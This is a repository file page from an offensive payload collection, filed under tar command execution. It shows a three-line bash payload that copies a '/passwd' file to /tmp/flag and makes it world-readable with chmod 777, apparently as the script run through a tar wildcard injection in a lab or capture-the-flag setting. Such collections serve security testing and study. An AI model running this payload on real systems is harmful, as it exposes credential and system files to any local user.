PayloadsAllTheThings/Tar commands execution/shell.sh

3 lines
57 B
Bash
Raw Normal View History

2016-10-18 11:36:18 +00:00
#!/bin/bash
cat /passwd > /tmp/flag
chmod 777 /tmp/flag